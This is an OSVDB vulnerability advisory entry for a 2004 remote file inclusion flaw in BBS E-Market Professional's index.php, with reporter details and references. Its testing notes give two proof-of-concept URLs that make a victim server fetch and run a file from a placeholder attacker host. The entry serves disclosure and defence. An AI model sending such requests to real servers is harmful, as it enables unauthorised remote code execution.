BBS E-Market Professional index.html Arbitrary Command Execution

2004-09-07T00:00:00
ID OSVDB:9802
Type osvdb
Reporter Ahmad Muammar(y3dips@echo.or.id)
Modified 2004-09-07T00:00:00

Description

Manual Testing Notes

http://[victim]/becommunity/community/index.php?pageurl=http://[attacker]/arbitrary.txt? http://[victim]/becommunity/community/index.php?from_market=Y&pageurl=http://[attacker]/arbitrary.txt?

References:

Vendor URL: http://www.nt.co.kr/ Security Tracker: 1011204 Secunia Advisory ID:12509 Related OSVDB ID: 9803 Other Advisory URL: http://echo.or.id/adv/adv06-y3dips-2004.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0078.html Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-09/0494.html